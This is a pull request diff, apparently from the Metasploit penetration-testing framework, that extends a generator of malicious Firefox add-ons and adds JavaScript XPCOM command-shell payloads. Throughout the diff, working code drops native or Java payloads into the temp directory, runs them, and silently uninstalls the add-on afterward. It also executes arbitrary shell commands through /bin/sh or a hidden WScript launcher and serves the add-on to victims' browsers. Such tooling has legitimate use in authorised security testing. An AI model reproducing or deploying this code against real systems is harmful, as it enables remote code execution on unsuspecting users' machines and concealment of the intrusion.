### PR TITLE
Add firefox js xpcom payloads for universal ff shells

### DIFF
--- a/lib/msf/core/exploit/remote/firefox_addon_generator.rb
+++ b/lib/msf/core/exploit/remote/firefox_addon_generator.rb
@@ -103,26 +103,33 @@ module Exploit::Remote::FirefoxAddonGenerator
       payload_file = jar.pack
       payload_name='payload.jar'
       payload_script=%q|
-  var java = Components.classes["@mozilla.org/appshell/window-mediator;1"].getService(Components.interfaces.nsIWindowMediator).getMostRecentWindow('navigator:browser').Packages.java
-  java.lang.System.setSecurityManager(null);
-  var cl = new java.net.URLClassLoader([new java.io.File(tmp.path).toURI().toURL()]);
-  var m = cl.loadClass("metasploit.Payload").getMethod("main", [java.lang.Class.forName("[Ljava.lang.String;")]);
-  m.invoke(null, [java.lang.reflect.Array.newInstance(java.lang.Class.forName("java.lang.String"), 0)]);
+        var java = Components.classes["@mozilla.org/appshell/window-mediator;1"]
+          .getService(Components.interfaces.nsIWindowMediator)
+          .getMostRecentWindow('navigator:browser').Packages.java;
+        java.lang.System.setSecurityManager(null);
+        var cl = new java.net.URLClassLoader([new java.io.File(tmp.path).toURI().toURL()]);
+        var m = cl.loadClass("metasploit.Payload").getMethod("main",
+          [java.lang.Class.forName("[Ljava.lang.String;")]
+        );
+        m.invoke(null, [java.lang.reflect.Array.newInstance(java.lang.Class.forName("java.lang.String"), 0)]);
       |
     else
       payload_file = generate_payload_exe
       return nil if payload_file.nil?
       payload_name = Rex::Text.rand_text_alphanumeric(8) + '.exe'
       payload_script=%q|
-  var process=Components.classes["@mozilla.org/process/util;1"].createInstance(Components.interfaces.nsIProcess);
-  process.init(tmp);
-  process.run(false,[],0);
+        var process=Components.classes["@mozilla.org/process/util;1"]
+          .createInstance(Components.interfaces.nsIProcess);
+        process.init(tmp);
+        process.run(false,[],0);
       |
       if target.name != 'Windows x86 (Native Payload)'
         payload_script = %q|
-        var chmod=Components.classes["@mozilla.org/file/local;1"].createInstance(Components.interfaces.nsILocalFile);
+        var chmod=Components.classes["@mozilla.org/file/local;1"]
+          .createInstance(Components.interfaces.nsILocalFile);
         chmod.initWithPath("/bin/chmod");
-        var process=Components.classes["@mozilla.org/process/util;1"].createInstance(Components.interfaces.nsIProcess);
+        var process=Components.classes["@mozilla.org/process/util;1"]
+          .createInstance(Components.interfaces.nsIProcess);
         process.init(chmod);
         process.run(true, ["+x", tmp.path], 2);
         | + payload_script
@@ -135,22 +142,22 @@ module Exploit::Remote::FirefoxAddonGenerator
 
     if target.name !~ /Javascript/
       bootstrap_script << %q|
-    var file = Components.classes["@mozilla.org/file/directory_service;1"].
-            getService(Components.interfaces.nsIProperties).
-            get("ProfD", Components.interfaces.nsIFile);
-    file.append("extensions");
+        var file = Components.classes["@mozilla.org/file/directory_service;1"].
+                getService(Components.interfaces.nsIProperties).
+                get("ProfD", Components.interfaces.nsIFile);
+        file.append("extensions");
       |
       bootstrap_script << %Q|xpi_guid="#{xpi_guid}";|
       bootstrap_script << %Q|payload_name="#{payload_name}";|
       bootstrap_script << %q|
-    file.append(xpi_guid);
-    file.append(payload_name);
-    var tmp = Components.classes["@mozilla.org/file/directory_service;1"].
-            getService(Components.interfaces.nsIProperties).
-            get("TmpD", Components.interfaces.nsIFile);
-    tmp.append(payload_name);
-    tmp.createUnique(Components.interfaces.nsIFile.NORMAL_FILE_TYPE, 0666);
-    file.copyTo(tmp.parent, tmp.leafName);
+        file.append(xpi_guid);
+        file.append(payload_name);
+        var tmp = Components.classes["@mozilla.org/file/directory_service;1"].
+                getService(Components.interfaces.nsIProperties).
+                get("TmpD", Components.interfaces.nsIFile);
+        tmp.append(payload_name);
+        tmp.createUnique(Components.interfaces.nsIFile.NORMAL_FILE_TYPE, 0666);
+        file.copyTo(tmp.parent, tmp.leafName);
       |
     end
 
@@ -158,15 +165,19 @@ module Exploit::Remote::FirefoxAddonGenerator
 
     if (datastore['AutoUninstall'])
       bootstrap_script <<  %q|
-  try { // Fx < 4.0
-    Components.classes["@mozilla.org/extensions/manager;1"].getService(Components.interfaces.nsIExtensionManager).uninstallItem(xpi_guid);
-  } catch (e) {}
-  try { // Fx 4.0 and later
-    Components.utils.import("resource://gre/modules/AddonManager.jsm");
-    AddonManager.getAddonByID(xpi_guid, function(addon) {
-      addon.uninstall();
-    });
-  } catch (e) {}
+        function uninstallMe() {
+          try { // Fx < 4.0
+            Components.classes["@mozilla.org/extensions/manager;1"]
+              .getService(Components.interfaces.nsIExtensionManager).uninstallItem(xpi_guid);
+          } catch (e) {}
+          try { // Fx 4.0 and later
+            Components.utils.import("resource://gre/modules/AddonManager.jsm");
+            AddonManager.getAddonByID(xpi_guid, function(addon) {
+              addon.uninstall();
+            });
+          } catch (e) {}
+        }
+        uninstallMe();
       |
     end
 

--- a/lib/msf/core/exploit/remote/firefox_addon_generator.rb
+++ b/lib/msf/core/exploit/remote/firefox_addon_generator.rb
@@ -23,7 +23,7 @@ module Exploit::Remote::FirefoxAddonGenerator
           [ 'Universal (Javascript XPCOM Shell)',
             {
               'Platform' => 'firefox',
-              'Arch' => 'firefox'
+              'Arch' => ARCH_FIREFOX
             }
           ],
           [ 'Java Payload',
@@ -38,10 +38,22 @@ module Exploit::Remote::FirefoxAddonGenerator
               'Arch' => ARCH_X86
             }
           ],
+          [ 'Windows x64 (Native Payload)',
+            {
+              'Platform' => 'windows',
+              'Arch' => ARCH_X64
+            }
+          ],
           [ 'Linux x86 (Native Payload)',
             {
               'Platform' => 'linux',
               'Arch' => ARCH_X86
+            }
+          ],
+          [ 'Linux x64 (Native Payload)',
+            {
+              'Platform' => 'linux',
+              'Arch' => ARCH_X64
             }
           ],
           [ 'Mac OS X PPC (Native Payload)',
@@ -54,6 +66,12 @@ module Exploit::Remote::FirefoxAddonGenerator
             {
               'Platform' => 'osx',
               'Arch' => ARCH_X86
+            }
+          ],
+          [ 'Mac OS X x64 (Native Payload)',
+            {
+              'Platform' => 'osx',
+              'Arch' => ARCH_X64
             }
           ]
         ],

--- a/lib/msf/core/exploit/remote/firefox_addon_generator.rb
+++ b/lib/msf/core/exploit/remote/firefox_addon_generator.rb
@@ -10,63 +10,76 @@
 module Msf
 module Exploit::Remote::FirefoxAddonGenerator
 
+  # for calling #generate_payload_exe
+  include Msf::Exploit::EXE
+
   # Add in the supported datastore options
-  def initialize( info = {} )
+  def initialize(info = {})
     super(update_info(info,
       'Platform'      => %w{ java linux osx solaris win },
       'Payload'       => { 'BadChars' => '', 'DisableNops' => true },
       'Targets'       =>
         [
-          [ 'Generic (Java Payload)',
+          [ 'Universal (Javascript XPCOM Shell)',
             {
-              'Platform' => ['java'],
+              'Platform' => 'firefox',
+              'Arch' => 'firefox'
+            }
+          ],
+          [ 'Java Payload',
+            {
+              'Platform' => 'java',
               'Arch' => ARCH_JAVA
             }
           ],
           [ 'Windows x86 (Native Payload)',
             {
               'Platform' => 'win',
-              'Arch' => ARCH_X86,
+              'Arch' => ARCH_X86
             }
           ],
           [ 'Linux x86 (Native Payload)',
             {
               'Platform' => 'linux',
-              'Arch' => ARCH_X86,
+              'Arch' => ARCH_X86
             }
           ],
           [ 'Mac OS X PPC (Native Payload)',
             {
               'Platform' => 'osx',
-              'Arch' => ARCH_PPC,
+              'Arch' => ARCH_PPC
             }
           ],
           [ 'Mac OS X x86 (Native Payload)',
             {
               'Platform' => 'osx',
-              'Arch' => ARCH_X86,
+              'Arch' => ARCH_X86
             }
           ]
         ],
-      'DefaultTarget'  => 1
+      'DefaultTarget' => 0
     ))
 
-    register_options( [
-      OptString.new('ADDONNAME', [ true,
-        "The addon name.",
-        "HTML5 Rendering Enhancements"
-        ]),
+    register_options([
+      OptString.new('ADDONNAME', [ true, "The addon name.", "HTML5 Rendering Enhancements" ]),
       OptBool.new('AutoUninstall', [ true,
         "Automatically uninstall the addon after payload execution",
         true
-        ])
+      ])
     ], self.class)
   end
 
   # @return [Rex::Zip::Archive] containing a .xpi, ready to be served with the
   # 'application/x-xpinstall' MIME type
-  def generate_addon_xpi
-    if target.name == 'Generic (Java Payload)'
+  # @return nil if payload fails to generate
+  def generate_addon_xpi(cli)
+    if target.name =~ /Javascript/
+      payload_file = nil
+      payload_name = Rex::Text.rand_text_alphanumeric(8) + '.exe'
+      payload_script = regenerate_payload(cli).encoded
+    elsif target.name =~ /Java /
+      p = regenerate_payload(cli)
+      return nil if p.nil?
       jar = p.encoded_jar
       jar.build_manifest(:main_class => "metasploit.Payload")
       payload_file = jar.pack
@@ -80,6 +93,7 @@ module Exploit::Remote::FirefoxAddonGenerator
       |
     else
       payload_file = generate_payload_exe
+      return nil if payload_file.nil?
       payload_name = Rex::Text.rand_text_alphanumeric(8) + '.exe'
       payload_script=%q|
   var process=Components.classes["@mozilla.org/process/util;1"].createInstance(Components.interfaces.nsIProcess);
@@ -98,26 +112,30 @@ module Exploit::Remote::FirefoxAddonGenerator
     end
 
     zip = Rex::Zip::Archive.new
+    bootstrap_script = 'function startup(data, reason) {'
     xpi_guid = Rex::Text.rand_guid
-    bootstrap_script = %q|
-function startup(data, reason) {
-  var file = Components.classes["@mozilla.org/file/directory_service;1"].
-          getService(Components.interfaces.nsIProperties).
-          get("ProfD", Components.interfaces.nsIFile);
-  file.append("extensions");
-    |
-    bootstrap_script << %Q|xpi_guid="#{xpi_guid}";|
-    bootstrap_script << %Q|payload_name="#{payload_name}";|
-    bootstrap_script << %q|
-  file.append(xpi_guid);
-  file.append(payload_name);
-  var tmp = Components.classes["@mozilla.org/file/directory_service;1"].
-          getService(Components.interfaces.nsIProperties).
-          get("TmpD", Components.interfaces.nsIFile);
-  tmp.append(payload_name);
-  tmp.createUnique(Components.interfaces.nsIFile.NORMAL_FILE_TYPE, 0666);
-  file.copyTo(tmp.parent, tmp.leafName);
-    |
+
+    if target.name !~ /Javascript/
+      bootstrap_script << %q|
+    var file = Components.classes["@mozilla.org/file/directory_service;1"].
+            getService(Components.interfaces.nsIProperties).
+            get("ProfD", Components.interfaces.nsIFile);
+    file.append("extensions");
+      |
+      bootstrap_script << %Q|xpi_guid="#{xpi_guid}";|
+      bootstrap_script << %Q|payload_name="#{payload_name}";|
+      bootstrap_script << %q|
+    file.append(xpi_guid);
+    file.append(payload_name);
+    var tmp = Components.classes["@mozilla.org/file/directory_service;1"].
+            getService(Components.interfaces.nsIProperties).
+            get("TmpD", Components.interfaces.nsIFile);
+    tmp.append(payload_name);
+    tmp.createUnique(Components.interfaces.nsIFile.NORMAL_FILE_TYPE, 0666);
+    file.copyTo(tmp.parent, tmp.leafName);
+      |
+    end
+
     bootstrap_script << payload_script
 
     if (datastore['AutoUninstall'])
@@ -137,7 +155,7 @@ function startup(data, reason) {
     bootstrap_script << "}"
 
     zip.add_file('bootstrap.js', bootstrap_script)
-    zip.add_file(payload_name, payload_file)
+    zip.add_file(payload_name, payload_file) unless payload_file.nil?
     zip.add_file('chrome.manifest', "content\t#{xpi_guid}\t./\noverlay\tchrome://browser/content/browser.xul\tchrome://#{xpi_guid}/content/overlay.xul\n")
     zip.add_file('install.rdf', %Q|<?xml version="1.0"?>
 <RDF xmlns="http://www.w3.org/1999/02/22-rdf-syntax-ns#" xmlns:em="http://www.mozilla.org/2004/em-rdf#">

--- a/lib/msf/core/exploit/remote/firefox_addon_generator.rb
+++ b/lib/msf/core/exploit/remote/firefox_addon_generator.rb
@@ -26,12 +26,6 @@ module Exploit::Remote::FirefoxAddonGenerator
               'Arch' => ARCH_FIREFOX
             }
           ],
-          [ 'Java Payload',
-            {
-              'Platform' => 'java',
-              'Arch' => ARCH_JAVA
-            }
-          ],
           [ 'Windows x86 (Native Payload)',
             {
               'Platform' => 'win',
@@ -95,24 +89,6 @@ module Exploit::Remote::FirefoxAddonGenerator
       payload_file = nil
       payload_name = Rex::Text.rand_text_alphanumeric(8) + '.exe'
       payload_script = regenerate_payload(cli).encoded
-    elsif target.name =~ /Java /
-      p = regenerate_payload(cli)
-      return nil if p.nil?
-      jar = p.encoded_jar
-      jar.build_manifest(:main_class => "metasploit.Payload")
-      payload_file = jar.pack
-      payload_name='payload.jar'
-      payload_script=%q|
-        var java = Components.classes["@mozilla.org/appshell/window-mediator;1"]
-          .getService(Components.interfaces.nsIWindowMediator)
-          .getMostRecentWindow('navigator:browser').Packages.java;
-        java.lang.System.setSecurityManager(null);
-        var cl = new java.net.URLClassLoader([new java.io.File(tmp.path).toURI().toURL()]);
-        var m = cl.loadClass("metasploit.Payload").getMethod("main",
-          [java.lang.Class.forName("[Ljava.lang.String;")]
-        );
-        m.invoke(null, [java.lang.reflect.Array.newInstance(java.lang.Class.forName("java.lang.String"), 0)]);
-      |
     else
       payload_file = generate_payload_exe
       return nil if payload_file.nil?

--- a/lib/msf/core/exploit/remote/firefox_addon_generator.rb
+++ b/lib/msf/core/exploit/remote/firefox_addon_generator.rb
@@ -14,7 +14,7 @@ module Exploit::Remote::FirefoxAddonGenerator
   include Msf::Exploit::EXE
 
   # Add in the supported datastore options
-  def initialize(info = {})
+  def initialize(info={})
     super(update_info(info,
       'Platform'      => %w{ java linux osx solaris win },
       'Payload'       => { 'BadChars' => '', 'DisableNops' => true },

--- a/lib/msf/core/module/platform.rb
+++ b/lib/msf/core/module/platform.rb
@@ -518,7 +518,7 @@ class Msf::Module::Platform
   end
 
   #
-  # Node.js
+  # Firefox
   #
   class Firefox < Msf::Module::Platform
     Rank = 100

--- a/lib/msf/core/module/platform.rb
+++ b/lib/msf/core/module/platform.rb
@@ -516,4 +516,12 @@ class Msf::Module::Platform
     Rank = 100
     Alias = "nodejs"
   end
+
+  #
+  # Node.js
+  #
+  class Firefox < Msf::Module::Platform
+    Rank = 100
+    Alias = "firefox"
+  end
 end

--- a/lib/msf/core/payload/firefox.rb
+++ b/lib/msf/core/payload/firefox.rb
@@ -1,5 +1,6 @@
 # -*- coding: binary -*-
 require 'msf/core'
+require 'json'
 
 module Msf::Payload::Firefox
 

--- a/lib/msf/core/payload/firefox.rb
+++ b/lib/msf/core/payload/firefox.rb
@@ -35,8 +35,6 @@ module Msf::Payload::Firefox
         .getService(Components.interfaces.nsIHttpProtocolHandler).userAgent;
       var jscript = (#{JSON.unparse({:src => jscript_launcher})}).src;
       var runCmd = function(cmd) {
-        var shPath = "/bin/sh";
-        var shFlag = "-c";
         var shEsc = "\\\\$&";
         var windows = (ua.indexOf("Windows")>-1);
 
@@ -73,10 +71,9 @@ module Msf::Payload::Firefox
         if (windows) {
           var shell = "cmd /c "+cmd;
           shell = "cmd /c "+shell.replace(/\\W/g, shEsc)+" >"+stdout.path+" 2>"+stderr.path;
-        }
-        else {
-          var shell = [shPath, shFlag, cmd.replace(/\\W/g, shEsc)].join(" ");
-          shell = shPath + " " + shFlag + " " + (shell + " >"+stdout.path+" 2>"+stderr.path).replace(/\\W/g, shEsc);
+        } else {
+          var shell = ["/bin/sh", "-c", cmd.replace(/\\W/g, shEsc)].join(" ");
+          shell = "/bin/sh -c "+(shell + " >"+stdout.path+" 2>"+stderr.path).replace(/\\W/g, shEsc);
         }
         var process = Components.classes["@mozilla.org/process/util;1"]
           .createInstance(Components.interfaces.nsIProcess);
@@ -89,9 +86,9 @@ module Msf::Payload::Firefox
           var args = [jscriptFile.path, shell];
           process.run(true, args, args.length);
         } else {
-          sh.initWithPath(shPath);
+          sh.initWithPath("/bin/sh");
           process.init(sh);
-          process.run(true, [shFlag, shell], 2);
+          process.run(true, ["-c", shell], 2);
         }
 
         if (windows) {

--- a/lib/msf/core/payload/firefox.rb
+++ b/lib/msf/core/payload/firefox.rb
@@ -3,7 +3,7 @@ require 'msf/core'
 
 module Msf::Payload::Firefox
   def read_file_source
-    %q|
+    %Q|
       var readFile = function(path) {
         try {
           var file = Components.classes["@mozilla.org/file/local;1"]
@@ -23,16 +23,17 @@ module Msf::Payload::Firefox
           fileStream.close();
           file.remove(true);
 
-          return array.map(function(aItem) { return String.fromCharCode(aItem); }).join("").trim();
-        } catch (e) { return ["",""]; }
+          return array.map(function(aItem) { return String.fromCharCode(aItem); }).join("");
+        } catch (e) { return ""; }
       };
     |
   end
 
   def run_cmd_source
-    %q|
+    %Q|
       var ua = Components.classes["@mozilla.org/network/protocol;1?name=http"]
         .getService(Components.interfaces.nsIHttpProtocolHandler).userAgent;
+      var _cmd;
       var runCmd = function(cmd) {
         var shPath = "/bin/sh";
         var shFlag = "-c";
@@ -61,7 +62,8 @@ module Msf::Payload::Firefox
                    .createInstance(Components.interfaces.nsILocalFile);
         sh.initWithPath(shPath);
 
-        var shell = shPath + " " + shFlag + " " + (cmd + " >"+stdout.path+" 2>"+stderr.path).replace(/\\W/g, shEsc);
+        var shell = shPath + " " + shFlag + " " + cmd.replace(/\\W/g, shEsc);
+        shell = shPath + " " + shFlag + " " + (shell + " >"+stdout.path+" 2>"+stderr.path).replace(/\\W/g, shEsc);
 
         var process = Components.classes["@mozilla.org/process/util;1"]
           .createInstance(Components.interfaces.nsIProcess);

--- a/lib/msf/core/payload/firefox.rb
+++ b/lib/msf/core/payload/firefox.rb
@@ -88,15 +88,18 @@ module Msf::Payload::Firefox
           var tag = "[!JAVASCRIPT]";
           var sync = true;  // avoid zalgo's reach
           var sent = false;
+          var retVal = null;
 
-          var retVal = Function('send', js[1])(function(r){
-            if (sent) return;
-            sent = true
-            if (r) {
-              if (sync) setTimeout(function(){ cb(false, r+tag+"\\n"); });
-              else      cb(false, r+tag+"\\n");
-            }
-          });
+          try {
+            retVal = Function('send', js[1])(function(r){
+              if (sent) return;
+              sent = true
+              if (r) {
+                if (sync) setTimeout(function(){ cb(false, r+tag+"\\n"); });
+                else      cb(false, r+tag+"\\n");
+              }
+            });
+          } catch (e) { retVal = e.message; }
 
           sync = false;
 

--- a/lib/msf/core/payload/firefox.rb
+++ b/lib/msf/core/payload/firefox.rb
@@ -1,0 +1,74 @@
+# -*- coding: binary -*-
+require 'msf/core'
+
+module Msf::Payload::Firefox
+  def read_file_source
+    %q|
+      var readFile = function(path) {
+        try {
+          var file = Components.classes["@mozilla.org/file/local;1"]
+                   .createInstance(Components.interfaces.nsILocalFile);
+          file.initWithPath(path);
+
+          var fileStream = Components.classes["@mozilla.org/network/file-input-stream;1"]
+                           .createInstance(Components.interfaces.nsIFileInputStream);
+          fileStream.init(file, 1, 0, false);
+
+          var binaryStream = Components.classes["@mozilla.org/binaryinputstream;1"]
+                             .createInstance(Components.interfaces.nsIBinaryInputStream);
+          binaryStream.setInputStream(fileStream);
+          var array = binaryStream.readByteArray(fileStream.available());
+
+          binaryStream.close();
+          fileStream.close();
+          file.remove(true);
+
+          return array.map(function(aItem) { return String.fromCharCode(aItem); }).join("").trim();
+        } catch (e) { return ["",""]; }
+      };
+    |
+  end
+
+  def run_cmd_source
+    %q|
+      var ua = Components.classes["@mozilla.org/network/protocol;1?name=http"]
+        .getService(Components.interfaces.nsIHttpProtocolHandler).userAgent;
+      var runCmd = function(cmd) {
+        var shPath = "/bin/sh";
+        var shFlag = "-c";
+        var shEsc = "\\\\$&";
+
+        if (ua.indexOf("Windows")>-1) {
+          shPath = "C:\\\\Windows\\\\system32\\\\cmd.exe";
+          shFlag = "/c";
+          shEsc = "\\^$&";
+        }
+
+        var stdoutFile = "#{Rex::Text.rand_text_alphanumeric(8)}";
+        var stderrFile = "#{Rex::Text.rand_text_alphanumeric(8)}";
+
+        var stdout = Components.classes["@mozilla.org/file/directory_service;1"]
+          .getService(Components.interfaces.nsIProperties)
+          .get("TmpD", Components.interfaces.nsIFile);
+        stdout.append(stdoutFile);
+
+        var stderr = Components.classes["@mozilla.org/file/directory_service;1"]
+          .getService(Components.interfaces.nsIProperties)
+          .get("TmpD", Components.interfaces.nsIFile);
+        stderr.append(stderrFile);
+
+        var sh = Components.classes["@mozilla.org/file/local;1"]
+                   .createInstance(Components.interfaces.nsILocalFile);
+        sh.initWithPath(shPath);
+
+        var shell = shPath + " " + shFlag + " " + (cmd + " >"+stdout.path+" 2>"+stderr.path).replace(/\\W/g, shEsc);
+
+        var process = Components.classes["@mozilla.org/process/util;1"]
+          .createInstance(Components.interfaces.nsIProcess);
+        process.init(sh);
+        process.run(true, [shFlag, shell], 2);
+        return [readFile(stdout.path), readFile(stderr.path)];
+      };
+    |
+  end
+end

--- a/lib/msf/core/payload/firefox.rb
+++ b/lib/msf/core/payload/firefox.rb
@@ -33,16 +33,28 @@ module Msf::Payload::Firefox
     %Q|
       var ua = Components.classes["@mozilla.org/network/protocol;1?name=http"]
         .getService(Components.interfaces.nsIHttpProtocolHandler).userAgent;
-      var _cmd;
+      var jscript = (#{JSON.unparse({:src => jscript_launcher})}).src;
       var runCmd = function(cmd) {
         var shPath = "/bin/sh";
         var shFlag = "-c";
         var shEsc = "\\\\$&";
+        var windows = (ua.indexOf("Windows")>-1);
 
-        if (ua.indexOf("Windows")>-1) {
-          shPath = "C:\\\\Windows\\\\system32\\\\cmd.exe";
-          shFlag = "/c";
+        if (windows) {
           shEsc = "\\^$&";
+          var jscriptFile = Components.classes["@mozilla.org/file/directory_service;1"]
+            .getService(Components.interfaces.nsIProperties)
+            .get("TmpD", Components.interfaces.nsIFile);
+          jscriptFile.append('#{Rex::Text.rand_text_alphanumeric(8)}.js');
+          var stream = Components.classes["@mozilla.org/network/safe-file-output-stream;1"]
+            .createInstance(Components.interfaces.nsIFileOutputStream);
+          stream.init(jscriptFile, 0x04 \| 0x08 \| 0x20, 0666, 0);
+          stream.write(jscript, jscript.length);
+          if (stream instanceof Components.interfaces.nsISafeOutputStream) {
+            stream.finish();
+          } else {
+            stream.close();
+          }
         }
 
         var stdoutFile = "#{Rex::Text.rand_text_alphanumeric(8)}";
@@ -58,19 +70,46 @@ module Msf::Payload::Firefox
           .get("TmpD", Components.interfaces.nsIFile);
         stderr.append(stderrFile);
 
-        var sh = Components.classes["@mozilla.org/file/local;1"]
-                   .createInstance(Components.interfaces.nsILocalFile);
-        sh.initWithPath(shPath);
-
-        var shell = shPath + " " + shFlag + " " + cmd.replace(/\\W/g, shEsc);
-        shell = shPath + " " + shFlag + " " + (shell + " >"+stdout.path+" 2>"+stderr.path).replace(/\\W/g, shEsc);
-
+        if (windows) {
+          var shell = "cmd /c "+cmd;
+          shell = "cmd /c "+shell.replace(/\\W/g, shEsc)+" >"+stdout.path+" 2>"+stderr.path;
+        }
+        else {
+          var shell = [shPath, shFlag, cmd.replace(/\\W/g, shEsc)].join(" ");
+          shell = shPath + " " + shFlag + " " + (shell + " >"+stdout.path+" 2>"+stderr.path).replace(/\\W/g, shEsc);
+        }
         var process = Components.classes["@mozilla.org/process/util;1"]
           .createInstance(Components.interfaces.nsIProcess);
-        process.init(sh);
-        process.run(true, [shFlag, shell], 2);
-        return [readFile(stdout.path), readFile(stderr.path)];
+        var sh = Components.classes["@mozilla.org/file/local;1"]
+                   .createInstance(Components.interfaces.nsILocalFile);
+
+        if (windows) {
+          sh.initWithPath("C:\\\\Windows\\\\System32\\\\wscript.exe");
+          process.init(sh);
+          var args = [jscriptFile.path, shell];
+          process.run(true, args, args.length);
+        } else {
+          sh.initWithPath(shPath);
+          process.init(sh);
+          process.run(true, [shFlag, shell], 2);
+        }
+
+        if (windows) {
+          jscriptFile.remove(true);
+          return [cmd+"\\r\\n"+readFile(stdout.path), readFile(stderr.path)];
+        }
+        else {
+          return [readFile(stdout.path), readFile(stderr.path)];
+        }
       };
+    |
+  end
+
+  def jscript_launcher
+    %Q|
+      var cmdStr = '';
+      for (var i = 0; i < WScript.arguments.length; i++) cmdStr += WScript.arguments(i) + " ";
+      (new ActiveXObject("WScript.Shell")).Run(cmdStr, 0, true);
     |
   end
 end

--- a/lib/rex/constants.rb
+++ b/lib/rex/constants.rb
@@ -64,29 +64,30 @@ LEV_3     = 3
 #
 # Architecture constants
 #
-ARCH_ANY    = '_any_'
-ARCH_X86    = 'x86'
-ARCH_X86_64 = 'x86_64'
-ARCH_X64    = 'x64' # To be used for compatability with ARCH_X86_64
-ARCH_MIPS   = 'mips'
-ARCH_MIPSLE = 'mipsle'
-ARCH_MIPSBE = 'mipsbe'
-ARCH_PPC    = 'ppc'
-ARCH_PPC64  = 'ppc64'
-ARCH_CBEA   = 'cbea'
-ARCH_CBEA64 = 'cbea64'
-ARCH_SPARC  = 'sparc'
-ARCH_CMD    = 'cmd'
-ARCH_PHP    = 'php'
-ARCH_TTY    = 'tty'
-ARCH_ARMLE  = 'armle'
-ARCH_ARMBE  = 'armbe'
-ARCH_JAVA   = 'java'
-ARCH_RUBY   = 'ruby'
-ARCH_DALVIK = 'dalvik'
-ARCH_PYTHON = 'python'
-ARCH_NODEJS = 'nodejs'
-ARCH_TYPES  =
+ARCH_ANY     = '_any_'
+ARCH_X86     = 'x86'
+ARCH_X86_64  = 'x86_64'
+ARCH_X64     = 'x64' # To be used for compatability with ARCH_X86_64
+ARCH_MIPS    = 'mips'
+ARCH_MIPSLE  = 'mipsle'
+ARCH_MIPSBE  = 'mipsbe'
+ARCH_PPC     = 'ppc'
+ARCH_PPC64   = 'ppc64'
+ARCH_CBEA    = 'cbea'
+ARCH_CBEA64  = 'cbea64'
+ARCH_SPARC   = 'sparc'
+ARCH_CMD     = 'cmd'
+ARCH_PHP     = 'php'
+ARCH_TTY     = 'tty'
+ARCH_ARMLE   = 'armle'
+ARCH_ARMBE   = 'armbe'
+ARCH_JAVA    = 'java'
+ARCH_RUBY    = 'ruby'
+ARCH_DALVIK  = 'dalvik'
+ARCH_PYTHON  = 'python'
+ARCH_NODEJS  = 'nodejs'
+ARCH_FIREFOX = 'firefox'
+ARCH_TYPES   =
   [
     ARCH_X86,
     ARCH_X86_64,
@@ -107,7 +108,8 @@ ARCH_TYPES  =
     ARCH_RUBY,
     ARCH_DALVIK,
     ARCH_PYTHON,
-    ARCH_NODEJS
+    ARCH_NODEJS,
+    ARCH_FIREFOX
   ]
 
 ARCH_ALL = ARCH_TYPES

--- a/modules/exploits/multi/browser/firefox_proto_crmfrequest.rb
+++ b/modules/exploits/multi/browser/firefox_proto_crmfrequest.rb
@@ -75,7 +75,7 @@ class Metasploit3 < Msf::Exploit::Remote
       <body>
       #{datastore['CONTENT']}
       <div id='payload' style='display:none'>
-      if (!window.done){
+      if (!window.done) {
         window.AddonManager.getInstallForURL(
           '#{get_module_uri}/addon.xpi',
           function(install) { install.install() },

--- a/modules/exploits/multi/browser/firefox_proto_crmfrequest.rb
+++ b/modules/exploits/multi/browser/firefox_proto_crmfrequest.rb
@@ -9,7 +9,6 @@ class Metasploit3 < Msf::Exploit::Remote
   Rank = ExcellentRanking
 
   include Msf::Exploit::Remote::BrowserExploitServer
-  include Msf::Exploit::EXE
   include Msf::Exploit::Remote::FirefoxAddonGenerator
 
   def initialize(info = {})
@@ -57,7 +56,7 @@ class Metasploit3 < Msf::Exploit::Remote
   def on_request_exploit(cli, request, target_info)
     if request.uri.match(/\.xpi$/i)
       print_status("Sending the malicious addon")
-      send_response(cli, generate_addon_xpi.pack, { 'Content-Type' => 'application/x-xpinstall' })
+      send_response(cli, generate_addon_xpi(cli).pack, { 'Content-Type' => 'application/x-xpinstall' })
     else
       print_status("Sending HTML")
       send_response_html(cli, generate_html(target_info))

--- a/modules/exploits/multi/browser/firefox_xpi_bootstrapped_addon.rb
+++ b/modules/exploits/multi/browser/firefox_xpi_bootstrapped_addon.rb
@@ -11,7 +11,6 @@ class Metasploit3 < Msf::Exploit::Remote
   Rank = ExcellentRanking
 
   include Msf::Exploit::Remote::HttpServer::HTML
-  include Msf::Exploit::EXE
   include Msf::Exploit::Remote::FirefoxAddonGenerator
 
   def initialize( info = {} )
@@ -20,7 +19,7 @@ class Metasploit3 < Msf::Exploit::Remote
       'Description'   => %q{
           This exploit dynamically creates a .xpi addon file.
         The resulting bootstrapped Firefox addon is presented to
-        the victim via a web page with.  The victim's Firefox browser
+        the victim via a web page. The victim's Firefox browser
         will pop a dialog asking if they trust the addon.
 
         Once the user clicks "install", the addon is installed and
@@ -31,7 +30,7 @@ class Metasploit3 < Msf::Exploit::Remote
         uninstall the addon once the payload has been executed.
       },
       'License'       => MSF_LICENSE,
-      'Author'        => [ 'mihi' ],
+      'Author'        => [ 'mihi', 'joev' ],
       'References'    =>
         [
           [ 'URL', 'https://developer.mozilla.org/en/Extensions/Bootstrapped_extensions' ],
@@ -41,33 +40,30 @@ class Metasploit3 < Msf::Exploit::Remote
     ))
   end
 
-  def on_request_uri( cli, request )
-    if not request.uri.match(/\.xpi$/i)
-      if not request.uri.match(/\/$/)
-        send_redirect( cli, get_resource() + '/', '')
-        return
+  def on_request_uri(cli, request)
+    if request.uri.match(/\.xpi$/i)
+      # browser has navigated to the .xpi file
+      print_status("Sending xpi and waiting for user to click 'accept'...")
+      if not xpi = generate_addon_xpi(cli)
+        print_error("Failed to generate the payload.")
+        send_not_found(cli)
+      else
+        send_response(cli, xpi.pack, { 'Content-Type' => 'application/x-xpinstall' })
       end
-
-      print_status("Handling request..." )
-
-      send_response_html( cli, generate_html, { 'Content-Type' => 'text/html' } )
-      return
+    else
+      # initial browser request
+      # force the user to access a directory-like URL
+      if not request.uri.match(/\/$/)
+        print_status("Redirecting request." )
+        send_redirect(cli, "#{get_resource}/")
+      else
+        # user has navigated
+        print_status("Sending response HTML." )
+        send_response_html(cli, generate_html)
+      end
     end
 
-    # If we haven't returned yet, then this is a request for our xpi,
-    # so build one
-    p = regenerate_payload(cli)
-    if not p
-      print_error("Failed to generate the payload.")
-      # Send them a 404 so the browser doesn't hang waiting for data
-      # that will never come.
-      send_not_found(cli)
-      return
-    end
-
-    print_status("Sending xpi and waiting for user to click 'accept'...")
-    send_response( cli, generate_addon_xpi.pack, { 'Content-Type' => 'application/x-xpinstall' } )
-    handler( cli )
+    handler(cli)
   end
 
   def generate_html

--- a/modules/payloads/singles/firefox/exec.rb
